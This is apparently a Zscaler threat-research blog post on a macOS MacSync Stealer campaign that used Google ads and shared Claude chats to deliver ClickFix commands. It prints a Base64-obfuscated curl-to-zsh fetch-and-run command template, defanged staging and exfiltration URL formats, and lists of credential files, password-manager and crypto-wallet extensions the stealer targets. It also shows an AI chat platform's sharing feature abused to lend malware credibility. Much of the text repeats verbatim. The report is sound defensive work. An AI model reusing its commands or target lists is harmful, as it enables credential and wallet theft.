IntroductionClickFix is a widely employed attack technique, first seen in 2024, where a victim is instructed to paste-and-run instructions on their system to “fix” a problem or install software. The seemingly benign instructions are, in fact, malicious and lead to the deployment of malware onto the victim’s system. Zscaler Threat Hunting has identified recent ClickFix attacks abusing Anthropic’s Claude platform through the use of shareable Claude chats to host these instructions, which marks a shift from typical attacks. As AI platforms have grown in popularity, threat actors have increasingly abused legitimate features such as shareable chats to lend credibility to malicious content. In this blog post, the Zscaler Threat Hunting team examines a MacSync Stealer campaign distributed through shared Claude chats.Note: Zscaler Threat Hunting notified Anthropic about the misuse of its platform, and the campaign’s shared chats were no longer accessible at the time of publishing this blog. Key TakeawaysThe threat actors behind MacSync Stealer continue to evolve their techniques, tactics, and procedures (TTPs) by abusing AI platforms (such as Claude) to host ClickFix content and increase perceived legitimacy.The threat actor behind MacSync Stealer has shifted distribution from via fake “cracked” applications to the now-common ClickFix technique.Malvertising was a key part of this campaign. Attackers used paid ads to lure Mac users searching for Claude into shared Claude chats that instructed them to run ClickFix commands leading to the download of MacSync Stealer.MacSync Stealer is capable of stealing credentials, sensitive files, and cryptocurrency wallet data. Technical AnalysisThe Zscaler Threat Hunting team observed multiple stages in this ClickFix attack chain.First stageThe victim searches for a term such as “claude download” in a search engine and sees a paid ad in the results that points to a shared Claude chat link. From the start, the use of the official Claude domain adds legitimacy to the search result. The victim clicks on the paid ad and is redirected to a shared Claude chat, as shown in the figure below. Figure 1: MacSync Stealer ClickFix instructions hosted in a shared Claude chat.Aside from the hosting platform itself being legitimate, threat actors also crafted the content to appear authentic. The chat is labeled “Shared by Apple Support” in the top right corner. The threat actors likely achieved this by setting their Claude display name as “Apple Support,” causing this label to appear when the shareable link is generated. The installation command the victim is instructed to run is a curl command with the destination URL obfuscated using Base64 encoding. The command typically follows the format: curl -kfsSL $(echo ‘[base64_string]’|base64 -D)|zsh The Base64-encoded string usually decodes to a URL in the format http://[domain]/curl/[a-f0-9]{64}$, which serves as the first stage of the MacSync Stealer infection. A curl request to this URL returns a Z shell (zsh) script, which is then piped directly to zsh, as specified at the end of the installation command.An example of the MacSync Stealer staging URL is the following: http://lasvegaslaminateflooring[.]com/curl/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abbThe zsh script returned from this URL contains a blob that is first Base64-decoded then decompressed using gzip to reveal a second-stage script. This second-stage script is executed in the terminal using the eval command shown at the end of the figure below.Figure 2: Example Zsh script returned by the example first-stage URL distributing MacSync Stealer.Second stageFunctionally, this second-stage zsh script first redirects all output to /dev/null, essentially hiding all visible indications of execution. Next, the script downloads the third stage of MacSync Stealer, which contains the core stealing functionality, from a URL in the format $domain/dynamic?txd=$token, using the HTTP header api-key: $api_key (the values of $domain, $token, and $api_key are hardcoded in the script). The downloaded content is then piped directly to osascript, leaving no file trace on the affected system.Finally, the second-stage zsh script checks for the presence of a file named /tmp/osalogging.zip, which is expected to contain the sensitive information collected from the affected system. If the file exists and is non-zero in size, the script exfiltrates the collected data in 10MB chunks via HTTP PUT requests to a URL in the format:$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks In this scheme, $domain and $token are hardcoded in the script, $upload_id is generated per system based on the date and a randomly generated number, $total_chunks is calculated by dividing the file size by 10MB, and $i is set by the loop counter as each chunk is sent. The script retries each chunk upload up to eight times if the upload fails.After exfiltration is completed, the script deletes /tmp/osalogging.zip from the system, thereby leaving no trace of MacSync Stealer on the system.Third stageThe third stage of the malware containing the core stealing functionality has the following capabilities: Tries to access ~/Library/Cookies/, likely to gauge the access level at which the script is running. If access fails, The malware modifies ~/.zshrc to append a curl command that downloads the MacSync second-stage script and pipes the output to zsh. The command has the same format as the command pasted and run by the user in the first stage. This functionality implements persistence ensuring the second-stage script is downloaded and executed each time the terminal is opened. It also prompts the victim to grant full disk access by showing a prompt saying “Please allow access and reopen the terminal” with title “Full Disk Access required!” and then opening the Security & Privacy pane where this setting can be enabled.If access is successful, the script removes the curl command implementing persistence from ~/.zshrc and continues with the steps below.Creates the directory /tmp/macsync_0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb.lock which serves as a lock file indicating the information stealer is running.Tricks the victim into entering their macOS password by showing a fake prompt.Gathers stolen information into the directory /tmp/sync[randomNumber] with the capabilities described in the table below: CategoryCapabilityCredential access Copies all keychain files (~/Library/Keychains/*.keychain-db).Copies files from the folders Network/Cookies, Cookies, Web Data, Login Data in the local browser-specific storage paths for Chromium-based browsers to the folder Browsers (a list of targeted Chromium-based browsers and their browser-specific paths can be found in the Appendix).Copies browser files from Gecko-based browsers that may contain credentials (cookies.sqlite, cookies.sqlite-wal, cookies.sqlite-shm, formhistory.sqlite, formhistory.sqlite-wal, formhistory.sqlite-shm, key4.db, places.sqlite, places.sqlite-wal, places.sqlite-shm, signons.sqlite, cert9.db, logins.json, logins-backup.json) into the Browsers folder (a list of targeted Gecko-based browsers and their browser-specific paths can be found in the Appendix).Searches for known browser extensions used as password managers in Chromium-based browsers and copies relevant local files into an Extensions folder (a list of targeted extensions can be found in the Appendix).Discovery Performs system discovery and populates a file called info with the victim’s username and password, along with device fingerprinting information such as software, hardware, and graphics information.Gathers information about running processes and writes the results to SystemInfo/running_apps.txt and SystemInfo/processes.txt.CollectionCopies shell configuration and history files (.zshrc, .zsh_history, .bash_history, .gitconfig) and potential cloud keys from ~/.ssh, ~/.aws, ~/.kube into a Profile folder.Copies Telegram application files from /Users/[username]/Library/Application Support/Telegram Desktop/tdata/ to the folder Telegram Desktop.Gathers files from selected directories (Downloads, Documents, and Desktop) matching the extensions pdf, docx, doc, wallet, key, keys, db, txt, seed, rtf, kdbx, pem, and ovpn, and then stores them in a FileGrabber folder. The malware also targets select high-value files (including Safari Cookies/Autofill/History artifacts and Apple Notes files) and stores them in the same folder.Cryptocurrency Chrome extension enumeration & collectionSearches for known Chromium extensions associated with cryptocurrency wallets and copies relevant local files into a Wallets/Web folder (a list of targeted extensions can be found in the Appendix).Cryptocurrency desktop wallet application enumeration & collectionCopies entire folders corresponding to popular desktop cryptocurrency wallet applications into the Wallets/Desktop folder (a list of targeted folders can be found in the Appendix).Table 1: MacSync Stealer data theft capabilities.All data collected under /tmp/sync[randomNumber] is compressed into /tmp/osalogging.zip, which is then exfiltrated as described in the previous stage. After creating the archive, MacSync Stealer deletes the /tmp/sync* directory and removes the lock directory.Finally, MacSync Stealer attempts to download three additional payloads if the applications Ledger Wallet, Ledger Live, and Trezor Suite respectively are present on the affected system from the following URLs:lasvegaslaminateflooring[.]com/ledger/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/ledger/live/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/trezor/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abbThese payloads could not be retrieved at the time of analysis, but they are likely trojanized versions of the aforementioned applications.Malvertising campaign observationsSince Zscaler Threat Hunting analyzes Zscaler Internet Access (ZIA) logs across customers, we were able to obtain broader visibility into the scope of this campaign. This campaign appears to have been short-lived, running from June 12–19, 2026. Based on the UTM parameters observed in the traffic, we determined the following: The source of the ad links was always Google.We observed 22 unique campaign IDs.We observed the following 7 unique utm_term values: claudeclaude aiclaude codeclaude macai claudeclaude code desktop macclaude 客户 端 (client)Zscaler Threat Hunting observed the malicious domains used in these ClickFix / MacSync Stealer campaigns adopted themes related to local services in U.S. cities. The list below shows a subset of domains following this pattern (a complete list is provided in the IOCs section at the end of this blog post):realtorsmichigan[.]comcentralfloridapowerwash[.]comsyracusefertilitycenter[.]comdogtrainersgeorgia[.]comlasvegaslaminateflooring[.]commoldinspectiondayton[.]comnewjerseypetsitter[.]commiamipcsupport[.]comlifecoachrochester[.]comcabinrentalsnc[.]comfloridavacationvillarental[.]comlasvegasweddingreception[.]comdallasirrigationservices[.]comtoledotreeservices[.]comhomeinspectionsdelaware[.]comchicagometalscrap[.]comWe also observed Russian-language comments in the third-stage AppleScript payload, suggesting the threat actor behind these attacks is likely Russian-speaking. The table below shows examples of these comments and their translation:Russian-Language CommentTranslation– Простое копирование всех важных файлов (включая WAL/SHM)– Easily copy all important files (including WAL/SHM)– Убрана хрупкая SafeSQLiteCopy (часто падала когда Firefox запущен)– Removed fragile SafeSQLiteCopy (frequently crashed when Firefox was running)Table 2: Russian-language comments and their corresponding translations.  ConclusionThis ClickFix campaign distributing MacSync Stealer shows how threat actors are increasingly abusing trusted platforms for attacks. In this case, attackers used malvertising to direct users to shared Claude chats that contained ClickFix “paste-and-run” commands. Running those commands triggered a multi-stage infection chain that ultimately deployed MacSync Stealer on macOS devices, enabling credential and data theft. The Zscaler Threat Hunting team continues to track this activity and provides detections and IOCs to help identify and block related threats. Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to MacSync at various levels with the following threat names:HTML.Trojan.ClickFixOSX.PWS.MacSync Indicators Of Compromise (IOCs)Analyzed kill chain indicators lasvegaslaminateflooring[.]com/curl/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/dynamic?txd=0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/ledger/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/ledger/live/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abblasvegaslaminateflooring[.]com/trezor/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abbMacSync Stealer hosting domains  proviewhomeinspections[.]commeadow84[.]compearlanvil14[[.]]comdenverplumbingandwaterheater[.]comverse-57[.]comhawaiiwindowtinting[.]comslate16[.]comswisshomesforsale[.]compine-1[.]comgaragedoorskentucky[.]comquest-38[.]comfloridakitchencabinet[.]comworkshoplens[.]comshoresatin[.]comrudder93[.]comemberjourney18[.]compearlswift16[.]comjozuvisuals[.]comharbor-29[.]comstratosnova14[.]comhealthcareqai[.]comjourney71[.]comgainesvillewebsitedesign[.]comdubaivehiclemart[.]comgenomicsforge[.]comagingfighter[.]comworkshopcurrent[.]comluxuryswisshomes[.]commajordubai[.]comballad82[.]comquill-67[.]comcoloradoaffordablelawyer[.]comglowworkshop15[.]comtide-39[.]comfablecube15[.]comrealtorsmichigan[.]comcentralfloridapowerwash[.]compearl-49[.]comvineworkshop1[.]comsyracusefertilitycenter[.]comhavenaspen2[.]complumechisel[.]comchant-78[.]comkiteshore[.]comgeorgia[.]comrudder-bloom[.]comadvertisingeffectively[.]comkitefeather5[.]comdogtrainersgeorgia[.]comvibestride8[.]comconenctagent[.]comrobscarpetcleaning[.]compdrncosmetics[.]comsatin87[.]comlasvegaslaminateflooring[.]comgatravelagency[.]comharvest-53[.]comtrailshore17[.]comstratos37[.]comscope-quest[.]commoldinspectiondayton[.]comfern16[.]comkernel-frame[.]comnewjerseypetsitter[.]comlyricopal1[.]comfern-76[.]commiamipcsupport[.]comlanguageschoolai[.]comlakevine8[.]comtrekmesh15[.]comvinebridge12[.]comonyxkite[.]comsummit86[.]commaplecirrus[.]comquartzleap5[.]comcanvas-coral[.]comsatin40[.]comanvil-wave[.]combuynewgymequipment[.]comrenderframe20[.]comcabinrentalsnc[.]comslatesatin[.]comlifecoachrochester[.]comfloridavacationvillarental[.]comanvillyric1[.]comleaflyric4[.]comgarden13[.]comlasvegasweddingreception[.]comstitchstratos[.]comforgeboost16[.]comsummit-68[.]comaspen32[.]comflintfeather5[.]comlens-kite[.]comquest-raster[.]comorbitstitch5[.]comchisel-perch[.]comballadspark[.]comdelta-66[.]commeshfeed4[.]comdramshopliabilityattorney[.]comwillow-blaze[.]comtide-maple[.]comnimbusstratos12[.]comblueprintmesh[.]comsreachagent[.]comdallasirrigationservices[.]comtoledotreeservices[.]comaigenerativeos[.]combrowserling[.]comkernelfable[.]comhomeinspectionsdelaware[.]comdriftpress11[.]comanvil-89[.]comquillchisel20[.]comcodxeagent[.]com5x5web[.]compinescope11[.]comchicagometalscrap[.]comrudderwillow8[.]comolympiapetemergency[.]comperch-74[.]comaffordabletentrentals[.]comempexf[.]com699524[.]cc589669[.]cc625167[.]cctouristprogram[.]comyoauction[.]comforgequest2[.]comsdlasik[.]comcharlottefilmstudios[.]comcedar-satin[.]commarbellaresales[.]comweb-stat-2685[.]comsmratagent[.]comseattlefilmstudios[.]comalabamarecoverycenter[.]compaeviction[.]comcoloradoconstructionsupply[.]combyrnewealthmanagement[.]comhomeinspectionnaperville[.]comorbitstride7[.]comvacationrentalvirginia[.]comunifiedaiapi[.]comiowagaragedoor[.]combestbuydomain[.]comnapavalleymentalhealth[.]compurtwre[.]comatlanticwoodworking[.]compubre[.]comursamade[.]comtrailblazehealth[.]comznoeagent[.]comalluringsites[.]comapi-metrics-5453[.]comncsolarpanel[.]comapxeagent[.]comfullcolorprinters[.]comspotlessridesdetailing[.]comdrivinguber[.]comwolfwraps[.]comcurretagent[.]comelitefenceanddeck[.]comcashlessend[.]combuywx[.]comkitchenbathremodels[.]comaidevmaster[.]comdallasoverheaddoors[.]comaleeci[.]comtrufflecatering[.]comednasoftware[.]comjerryshvac[.]comkidsjumpandplay[.]comkirkcharlie[.]comcincycarpetcleaning[.]combeachjiujitsu[.]comwhichitaautosales[.]comhoustonpestcontrolcompany[.]com3plfast[.]comxprssit[.]comdualverify[.]comfredscarpetcleaning[.]combcrealestateagency[.]comfractocode[.]comprmieagent[.]comcoeragent[.]comsuzke[.]combelldredgingpump[.]comkylesplumbing[.]commiamidadenotary[.]comnationalspacecouncil[.]combriskinternet[.]commodernhomeai[.]comsonyda[.]comenvestassetmanagement[.]comthevenueapartments[.]combitcoinlnwallet[.]comideanica[.]comlongbeachmartialarts[.]comstelaragent[.]comcustomroofingcontractors[.]comgreenactiv[.]comlalandscapelighting[.]comarbokfind[.]comamedatur[.]comaisolutions247[.]comarbookfind[.]com AppendixTargeted Chromium-based browsers Browser NameBrowser-specific Local PathYandex/Users/[username]/Library/Application Support/Yandex/YandexBrowser/Chrome/Users/[username]/Library/Application Support/Google/Chrome/Brave/Users/[username]/Library/Application Support/BraveSoftware/Brave-Browser/Edge/Users/[username]/Library/Application Support/Microsoft Edge/Vivaldi/Users/[username]/Library/Application Support/Vivaldi/Opera/Users/[username]/Library/Application Support/com.operasoftware.Opera/OperaGX/Users/[username]/Library/Application Support/com.operasoftware.OperaGX/Chrome Beta/Users/[username]/Library/Application Support/Google/Chrome Beta/Chrome Canary/Users/[username]/Library/Application Support/Google/Chrome CanaryChromium/Users/[username]/Library/Application Support/Chromium/Chrome Dev/Users/[username]/Library/Application Support/Google/Chrome Dev/Arc/Users/[username]/Library/Application Support/Arc/User DataCoccoc/Users/[username]/Library/Application Support/CocCoc/Browser/ Targeted Gecko-based browsers Browser NameBrowser-Specific Local PathFirefox/Users/[username]/Library/Application Support/Firefox/Profiles/Zen/Users/[username]/Library/Application Support/zen/Profiles/LibreWolf/Users/[username]/Library/Application Support/LibreWolf/Profiles/Waterfox/Users/[username]/Library/Application Support/Waterfox/Profiles/ Targeted password manager extensions Extension IDExtension NameeiaeiblijfjekdanodkjadfinkhbfgcdNordPassaeblfdkhhhdcdjpifhhbdiojplfjncoa1PasswordbfogiafebfohielmmehodmfbbebbbpeiKeepernngceckbapebfimnlniiiahkandclblbBitwardenfdjamakpfbbddfjaooikfcpabgjikfkpDashlanehdokiejnpimakedhajhdlcegeplioahdLastPasspnlccmojcmeohlpggmfnbbiapkmbliobRoboFormghmbeldphafepmbegfdlkpapadhbakdeProton PasskmcfomidfpdkfieipokbalgegidffkalEnpassbnfdmghkeppfadphbnkjcicejfepnbfeSticky Password manager & safecaljgklbbfbcjjanaijlacgncafpegllAvira Password ManagerfolnjigffmbjmcjgmbbfcpleeddaedalLogMeOnceigkpcodhieompeloncfnbekccinhapdbZoho VaultadmmjipmmciaobhojoghlmleefbicajgNorton Password ManagerehpbfbahieociaeckccnklpdcmfaeegdRememBearepanfjkfahimkgomnigadpkobaefekcdIronVestdidegimhafipceonhjepacocaffmoppfPassboltoboonakemofpalcgghocfoadofidjkkkKeePassXCjgnfghanfbjmimbdmnjfofnbcgpkbegjKeePassHelpermmhlniccooihdimnnjhamobppdhaolmeKee – Password Managerdbfoemgnkgieejfkaddieamagdfepnff2FAS AuthbhghoamapcdpbohphigoooaddinpkbaiAuthenticatorlojeokmpinkpmpbakfkfpgfhpapbgdndGoogle Verified Access by DuoibpjepoimpcdofeoalokgpjafnjonkpcTOTP Authenticatorgmohoglkppnemohbcgjakmgengkeaphi2FA AuthenticatordckgbiealcgdhgjofgcignfngijpbgbaOpen Two-Factor AuthenticatorgmegpkknicehidppoebnmbhndjigpicaWeb2FA – AuthenticatoreiokpeobbgpinbmcanngjjbklmhlepanMFAuth – 2FA AuthenticatorodfkmgboddhcgopllebhkbjhokpojigdAuthenticator ExtensionppnbnpeolgkicgegkbkbjmhlideopijiMicrosoft Single Sign OncejfhijdfemlohmcjknpbeaohedoikppSecure TOTP Authenticatornmhjblhloefhbhgbfkdgdpjabaocnhhamini authenticatoriklgijhacenjgjgdnpnohbafpbmnccek2! AuthenticatorppkkcfblhfgmdmefkmkoomenhgecbemiAuthenticator for PClgndjfkadlbpaifdpbbobdodbaiaiakbAuthenticator AppbbphmbmmpomfelajledgdkgclfekileiAuthenticator app Targeted cryptocurrency wallet extensions Extension IDExtension NamenkbihfbeogaeaoehlefnkodbefgpgknnMetaMaskbfnaelmomeimhlpmgjnjophhpkkoljpaPhantomhnfanknocfeofbddgcijnmhnfnkdnaadCoinbase Wallet extensionfnjhmkhhmkbjkkabndcnnogagogbneecRonin WalletacmacodkjbdgmoleebolmdjonilkdbchRabby WalletegjidjbpglichdcondbcbdnbeeppgdphTrust WalletaholpfdialjgjfhomihkjbmgjidlcdnoExodus Web3 WalletpdliaogehgdbhbnmkklieghmmjkpigpaBybit WalletmcohilncbfahbmgdjkbpemcciiolgcgeOKX WallethpglfhgfnhbgpjdenjgmdgoeiappaflnGuarda Crypto WalletbhhhlbepdkbapadjdnnojkbgioiodbicSolflare WalletcjmkndjhnagcfbpiemnkdpomccnjblmjFinniekamfleanhcmjelnhaeljonilnmjpkcjcInspect – Crypto | NFTs | DeFi | Web3jnldfbidonfeldmalbflbmlebbipcnleBitfinity WalletfdcnegogpncmfejlfnffnofpngdiejiiRazor WalletklnaejjgbibmhlephnhpmaofohgkpgkdBearbykjjebdkfeagdoogagbhepmbimaphnflnUltra WalletldinpeekobnhjjdofggfgjlcehhmanljLeatherkpfchfdkjhcoekhdldggegebfakaaiogFRWT Secure DeFi Crypto WalletidnnbdplmphpflfnlkomgpfbpcgelopgXverse: Bitcoin Crypto WalletmlhakagmgkmonhdonhkpjeebfphligngABC Wallet – Safe Web3 walletbipdhagncpgaccgdbddmbpcabgjikfknClown WalletnhnkbkgjikgcigadomkphalanndcapjkCLV WalletklghhnkeealcohjjanjjdaeeggmfmlplZerion Wallet: Crypto & DeFiebfidpplhabeedpnhjnobghokpiiooljFewcha Move WalletemeeapjkbcbpbpgaagfchmcgglmebnenSurf WalletfldfpgipfncgndfolcbkdeeknbbbnhccMy Wallet: Crypto WalletpenjlddjkjgpnkllboccdgccekpkcbinOpenMask – TON wallethmeobnfnfcmdkdcmlblgagmfpfboieafCtrl WalletomaabbefbmiijedngplfjmnooppbclkkTonkeeper — wallet for TONjnlgamecbpmbajjfhmmmlhejkemejdmaBraavos: Bitcoin & Starknet WalletfpkhgmpbidmiogeglndfbkegfdlnajnfCosmostation WalletbifidjkcdpgfnlbcjpdkdcnbiooooblgFuelet Wallet | FuelamkmjjmmflddogmhpjloimipbofnfjihWombat – Gaming Wallet for Ethereum & EOSaeachknmefphepccionboohckonoeemgCoin98 Wallet Extension: Crypto & DefidmkamcknogkgcdfhhbddcghachkejeapKeplraiifbnbfobpmeekipheeijimdpnlpgppStation WalletehgjhhccekdedpbkifaojjaefeohnoeaAmbire Web3 WalletnknhiehlklippafakaeklbeglecifhadNabox WalletnphplpgoakhhjchkkhmiggakijnkhfndTON WalletibnejdfjmmkpcnlpebklmnkoeoihofecTronLinkafbcbjpbpfadlkmhmclhkeeodmamcflcMathWalletefbglgofoippbgcjepnhiblaibcnclgkMartian Aptos & Sui Wallet ExtensionfccgmnglbhajioalokbcidhcaikhlcpmZapit: Crypto Wallet & P2P ExchangemgffkfbidihjpoaomajlbgchddlicgpnPali WalletfopmedgnkfpebgllppeddmmochcookhcSuku WalletjojhfeoedkpkglbfimdfabpdfjaoolafPolymesh WalletabkahkcbhngaebpcgfmhkoioedceoigpCasper WalletgkeelndblnomfmjnophbhfhcjbcnemkaBitverse WallethgbeiipamcgbdjhfflifkgehomnmglgkHarbor – Crypto WalletellkdbaphhldpeajbepobaecooaoafpgASI Alliance WalletmdnaglckomeedfbogeajfajofmfgpoaeEnergy8 WalletckklhkaabbmdjkahiaaplikpdddkenicInternet Money | Crypto WalletfmblappgoiilbgafhjklehhfifbdoceeForbole XcnmamaachppnkjgnildpdmkaakejnhaeAuro WalletfijngjgcjhjmmpcmkeiomlglpeiijkldTalisman WalletlbjapbcmmceacocpimbpbidpgmlmoaaoMetaletibljocddagjghmlpgihahamcghfggcjcVirgo WalletgkodhkbmiflnmkipcmlhhgadebbeijhhSoter | Aleo WalletdbgnhckhnppddckangcjbkjnlddbjknaFin Wallet For SeiagoakfejjabomempkjlepdflaleeobhbCore Wallet: Crypto Made EasydgiehkgfknklegdhekgeabnhgfjhbajdKomodo WalletonhogfjeacnfoofkfgppdlbmlmnplgbnSubWallet – Polkadot WalletojggmchlghnjlapmfbnjholfjkiidbchVenom WalletpmmnimefaichbcnbndcfpaagbepnjaigFoxWalletanokgmphncpekkhclmingpimjmcooifbCompass WalletkkpllkodjeloidieedojogacfhpaihohEnkrypt: ETH, BTC and Solana WalletiokeahhehimjnekafflcihljlcjccdbeAlby – Bitcoin Wallet for Lightning & NostrifckdpamphokdglkkdomedpdegcjhjdpONTO WalletloinekcabhlmhjjbocijdoimmejangoaGlass wallet | Sui walletfcfcfllfndlomdhbehjjcoimbgofdncgLeap Wallet ExtensionifclboecfhkjbpmhgehodcjpciihhmifKlever WalletookjlbkiijinhpmnjffcofjonbfbgaocTemple WalletoafedfoadhdjjcipmcbecikgokpaphjkCoinWallet: BTC Crypto WalletmapbhaebnddapnmifbbkgeedkeplgjmfBiport WalletlgmpcpglpngdoalbgeoldeajfclnhafaSafePal Extension WalletppbibelpcjmhbdihakflkdcoccbgbkpoUniSat WalletffnbelfdoeiohenkjibnmadjiehjhajbSecondFi (Yoroi)opcgpfmipidbgpenhmajoajpbobppdilSlush — A Sui wallethdkobeeifhdplocklknbnejdelgagbaoCrypto wallet – Bitcoin & USDTlnnnmfcpbkafcpgdilckhmhbkkbpkmidKoala WalletnbdhibgjnjpnkajaghbffjbkcgljfgdiRamper Walletkmhcihpebfmpgmihbkipcmlmmioameka-kmphdnilpmdejikjdnlbcnmnabepfgkhOsmWallet – Your XRP wallet.khpkpbbcccdmmclmpigdgddabeilkdpdSuiet Sui WalletdlcobpjiigpikoobohmabehhmhfoodbbReady XmkpegjkblkkefacfnmkajcjmabijhclgMagic Eden WalletdldjpboieedgcmpkchcjcbijingjcgokFuel WalletjiidiaalihmmhddjgbnbgdfflelocpakBitget Wallet – Crypto, Web3 | Bitcoin & USDTTargeted desktop wallet application folders /Users/[username]/Library/Application Support/Exodus//Users/[username]/.electrum/wallets//Users/[username]/Library/Application Support/Atomic Wallet/Local Storage/leveldb//Users/[username]/Library/Application Support/Guarda//Users/[username]/Library/Application Support/Coinomi/wallets//Users/[username]/.sparrow/wallets//Users/[username]/.walletwasabi/client/Wallets//Users/[username]/Library/Application Support/Bitcoin//Users/[username]/Library/Application Support/Armory//Users/[username]/.electron-cash/wallets//Users/[username]/.bitmonero/wallets//Users/[username]/Library/Application Support/Litecoin//Users/[username]/Library/Application Support/DashCore//Users/[username]/Library/Application Support/Dogecoin//Users/[username]/.electrum-ltc/wallets//Users/[username]/Library/Application Support/BlueWallet//Users/[username]/Library/Application Support/Zengo//Users/[username]/Library/Application Support/Trust Wallet//Users/[username]/Library/Application Support/Ledger Live//Users/[username]/Library/Application Support/Ledger Wallet//Users/[username]/Library/Application Support/@trezor   

​[#item_full_content] IntroductionClickFix is a widely employed attack technique, first seen in 2024, where a victim is instructed to paste-and-run instructions on their system to “fix” a problem or install software. The seemingly benign instructions are, in fact, malicious and lead to the deployment of malware onto the victim’s system. Zscaler Threat Hunting has identified recent ClickFix attacks abusing Anthropic’s Claude platform through the use of shareable Claude chats to host these instructions, which marks a shift from typical attacks. As AI platforms have grown in popularity, threat actors have increasingly abused legitimate features such as shareable chats to lend credibility to malicious content. In this blog post, the Zscaler Threat Hunting team examines a MacSync Stealer campaign distributed through shared Claude chats.Note: Zscaler Threat Hunting notified Anthropic about the misuse of its platform, and the campaign’s shared chats were no longer accessible at the time of publishing this blog. Key TakeawaysThe threat actors behind MacSync Stealer continue to evolve their techniques, tactics, and procedures (TTPs) by abusing AI platforms (such as Claude) to host ClickFix content and increase perceived legitimacy.The threat actor behind MacSync Stealer has shifted distribution from via fake “cracked” applications to the now-common ClickFix technique.Malvertising was a key part of this campaign. Attackers used paid ads to lure Mac users searching for Claude into shared Claude chats that instructed them to run ClickFix commands leading to the download of MacSync Stealer.MacSync Stealer is capable of stealing credentials, sensitive files, and cryptocurrency wallet data. Technical AnalysisThe Zscaler Threat Hunting team observed multiple stages in this ClickFix attack chain.First stageThe victim searches for a term such as “claude download” in a search engine and sees a paid ad in the results that points to a shared Claude chat link. From the start, the use of the official Claude domain adds legitimacy to the search result. The victim clicks on the paid ad and is redirected to a shared Claude chat, as shown in the figure below. Figure 1: MacSync Stealer ClickFix instructions hosted in a shared Claude chat.Aside from the hosting platform itself being legitimate, threat actors also crafted the content to appear authentic. The chat is labeled “Shared by Apple Support” in the top right corner. The threat actors likely achieved this by setting their Claude display name as “Apple Support,” causing this label to appear when the shareable link is generated. The installation command the victim is instructed to run is a curl command with the destination URL obfuscated using Base64 encoding. The command typically follows the format: curl -kfsSL $(echo ‘[base64_string]’|base64 -D)|zsh The Base64-encoded string usually decodes to a URL in the format http://[domain]/curl/[a-f0-9]{64}$, which serves as the first stage of the MacSync Stealer infection. A curl request to this URL returns a Z shell (zsh) script, which is then piped directly to zsh, as specified at the end of the installation command.An example of the MacSync Stealer staging URL is the following: http://lasvegaslaminateflooring[.]com/curl/0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abbThe zsh script returned from this URL contains a blob that is first Base64-decoded then decompressed using gzip to reveal a second-stage script. This second-stage script is executed in the terminal using the eval command shown at the end of the figure below.Figure 2: Example Zsh script returned by the example first-stage URL distributing MacSync Stealer.Second stageFunctionally, this second-stage zsh script first redirects all output to /dev/null, essentially hiding all visible indications of execution. Next, the script downloads the third stage of MacSync Stealer, which contains the core stealing functionality, from a URL in the format $domain/dynamic?txd=$token, using the HTTP header api-key: $api_key (the values of $domain, $token, and $api_key are hardcoded in the script). The downloaded content is then piped directly to osascript, leaving no file trace on the affected system.Finally, the second-stage zsh script checks for the presence of a file named /tmp/osalogging.zip, which is expected to contain the sensitive information collected from the affected system. If the file exists and is non-zero in size, the script exfiltrates the collected data in 10MB chunks via HTTP PUT requests to a URL in the format:$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks In this scheme, $domain and $token are hardcoded in the script, $upload_id is generated per system based on the date and a randomly generated number, $total_chunks is calculated by dividing the file size by 10MB, and $i is set by the loop counter as each chunk is sent. The script retries each chunk upload up to eight times if the upload fails.After exfiltration is completed, the script deletes /tmp/osalogging.zip from the system, thereby leaving no trace of MacSync Stealer on the system.Third stageThe third stage of the malware containing the core stealing functionality has the following capabilities: Tries to access ~/Library/Cookies/, likely to gauge the access level at which the script is running. If access fails, The malware modifies ~/.zshrc to append a curl command that downloads the MacSync second-stage script and pipes the output to zsh. The command has the same format as the command pasted and run by the user in the first stage. This functionality implements persistence ensuring the second-stage script is downloaded and executed each time the terminal is opened. It also prompts the victim to grant full disk access by showing a prompt saying “Please allow access and reopen the terminal” with title “Full Disk Access required!” and then opening the Security & Privacy pane where this setting can be enabled.If access is successful, the script removes the curl command implementing persistence from ~/.zshrc and continues with the steps below.Creates the directory /tmp/macsync_0e17984a73d0b1c9c7c3916d32c49c8937f2e42d4c72c543c82999463a507abb.lock which serves as a lock file indicating the information stealer is running.Tricks the victim into entering their macOS password by showing a fake prompt.Gathers stolen information into the directory /tmp/sync[randomNumber] with the capabilities described in the table below: CategoryCapabilityCredential access Copies all keychain files (~/Library/Keychains/*.keychain-db).Copies files from the folders Network/Cookies, Cookies, Web Data, Login Data in the local browser-specific storage paths for Chromium-based browsers to the folder Browsers (a list of targeted Chromium-based browsers and their browser-specific paths can be found in the Appendix).Copies browser files from Gecko-based browsers that may contain credentials (cookies.sqlite, cookies.sqlite-wal, cookies.sqlite-shm, formhistory.sqlite, formhistory.sqlite-wal, formhistory.sqlite-shm, key4.db, places.sqlite, places.sqlite-wal, places.sqlite-shm, signons.sqlite, cert9.db, logins.json, logins-backup.json) into the Browsers folder (a list of targeted Gecko-based browsers and their browser-specific paths can be found in the Appendix).Searches for known browser extensions used as password managers in Chromium-based browsers and copies relevant local files into an Extensions folder (a list of targeted extensions can be found in the Appendix).Discovery Performs system discovery and populates a file called info with the victim’s username and password, along with device fingerprinting information such as software, hardware, and graphics information.Gathers information about running processes and writes the results to SystemInfo/running_apps.txt and SystemInfo/processes.txt.CollectionCopies shell configuration and history files (.zshrc, .zsh_history, .bash_history, 